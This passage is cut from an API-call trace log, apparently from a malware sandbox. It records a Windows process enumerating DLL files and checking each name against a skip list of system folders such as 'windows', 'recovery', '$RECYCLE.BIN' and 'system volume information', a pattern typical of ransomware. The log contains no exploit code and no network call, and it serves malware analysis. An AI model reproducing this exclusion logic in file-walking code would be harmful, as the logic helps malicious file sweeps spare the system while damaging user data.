ftCreationTime.dwLowDateTime=0x23428c3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23428c3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2984c3b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bea8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2=".") returned 1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="..") returned 1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="...") returned 1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="windows") returned -1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="recovery") returned -1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="perflogs") returned -1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="documents and settings") returned 1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="system volume information") returned -1 [0123.599] lstrcmpiW (lpString1="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpString2="msocache") returned -1 [0123.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0123.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpUsedDefaultChar=0x0) returned 40 [0123.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0123.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0123.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL", lpUsedDefaultChar=0x0) returned 40 [0123.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0123.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0123.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.600] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1814809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xe878, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="POWERMAPCLASSIFICATION.DLL", cAlternateFileName="POWERM~1.DLL")) returned 1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2=".") returned 1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="..") returned 1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="...") returned 1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="windows") returned -1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="recovery") returned -1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="perflogs") returned 1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="documents and settings") returned 1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="system volume information") returned -1 [0123.600] lstrcmpiW (lpString1="POWERMAPCLASSIFICATION.DLL", lpString2="msocache") returned 1 [0123.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERMAPCLASSIFICATION.DLL", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0123.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERMAPCLASSIFICATION.DLL", cchWideChar=26, lpMultiByteStr=0x241010, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERMAPCLASSIFICATION.DLL", lpUsedDefaultChar=0x0) returned 26 [0123.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERMAPCLASSIFICATION.DLL", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERMAPCLASSIFICATION.DLL", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERMAPCLASSIFICATION.DLL", lpUsedDefaultChar=0x0) returned 26 [0123.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0123.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0123.600] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf2662a44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf2662a44, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf2f072e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x73878, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="VISUALIZATIONCHART.DLL", cAlternateFileName="VISUAL~2.DLL")) returned 1 [0123.600] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2=".") returned 1 [0123.600] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="..") returned 1 [0123.600] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="...") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="windows") returned -1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="recovery") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="perflogs") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="documents and settings") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="system volume information") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHART.DLL", lpString2="msocache") returned 1 [0123.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCHART.DLL", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0123.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCHART.DLL", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONCHART.DLL", lpUsedDefaultChar=0x0) returned 22 [0123.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCHART.DLL", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0123.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0123.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCHART.DLL", cchWideChar=22, lpMultiByteStr=0x241380, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONCHART.DLL", lpUsedDefaultChar=0x0) returned 22 [0123.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0123.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0123.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.601] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb975fdf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb975fdf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb99c21f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51688, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="VISUALIZATIONCHARTCOMMON.DLL", cAlternateFileName="VISUAL~4.DLL")) returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2=".") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="..") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="...") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="windows") returned -1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="recovery") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="perflogs") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="documents and settings") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="system volume information") returned 1 [0123.601] lstrcmpiW (lpString1="VISUALIZATIONCHARTCOMMON.DLL", lpString2="msocache") returned 1 [0123.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCHARTCOMMON.DLL", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCHARTCOMMON.DLL", cchWideChar=28, lpMultiByteStr=0x240fe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONCHARTCOMMON.DLL", lpUsedDefaultChar=0x0) returned 28 [0123.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0123.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCHARTCOMMON.DLL", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCHARTCOMMON.DLL", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONCHARTCOMMON.DLL", lpUsedDefaultChar=0x0) returned 28 [0123.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0123.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.602] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf443017d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf280, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="VISUALIZATIONCOMMON.DLL", cAlternateFileName="VISUAL~3.DLL")) returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2=".") returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="..") returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="...") returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="windows") returned -1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="recovery") returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="perflogs") returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="documents and settings") returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="system volume information") returned 1 [0123.602] lstrcmpiW (lpString1="VISUALIZATIONCOMMON.DLL", lpString2="msocache") returned 1 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCOMMON.DLL", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0123.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCOMMON.DLL", cchWideChar=23, lpMultiByteStr=0x240f20, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONCOMMON.DLL", lpUsedDefaultChar=0x0) returned 23 [0123.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCOMMON.DLL", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCOMMON.DLL", cchWideChar=23, lpMultiByteStr=0x241330, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONCOMMON.DLL", lpUsedDefaultChar=0x0) returned 23 [0123.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0123.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0123.603] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bce2f5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bce2f5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x291680, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="VISUALIZATIONCONTROL.DLL", cAlternateFileName="VISUAL~1.DLL")) returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2=".") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="..") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="...") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="windows") returned -1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="recovery") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="perflogs") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="documents and settings") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="system volume information") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONCONTROL.DLL", lpString2="msocache") returned 1 [0123.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0123.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCONTROL.DLL", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0123.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCONTROL.DLL", cchWideChar=24, lpMultiByteStr=0x241268, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONCONTROL.DLL", lpUsedDefaultChar=0x0) returned 24 [0123.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0123.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCONTROL.DLL", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0123.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONCONTROL.DLL", cchWideChar=24, lpMultiByteStr=0x241178, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONCONTROL.DLL", lpUsedDefaultChar=0x0) returned 24 [0123.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0123.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0123.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.603] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3085a99, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3085a99, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x36c7dee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea8c0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="VISUALIZATIONDIRECTX.DLL", cAlternateFileName="VIA2F6~1.DLL")) returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2=".") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="..") returned 1 [0123.603] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="...") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="windows") returned -1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="recovery") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="perflogs") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="documents and settings") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="system volume information") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONDIRECTX.DLL", lpString2="msocache") returned 1 [0123.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONDIRECTX.DLL", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0123.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONDIRECTX.DLL", cchWideChar=24, lpMultiByteStr=0x241178, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONDIRECTX.DLL", lpUsedDefaultChar=0x0) returned 24 [0123.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONDIRECTX.DLL", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0123.604] 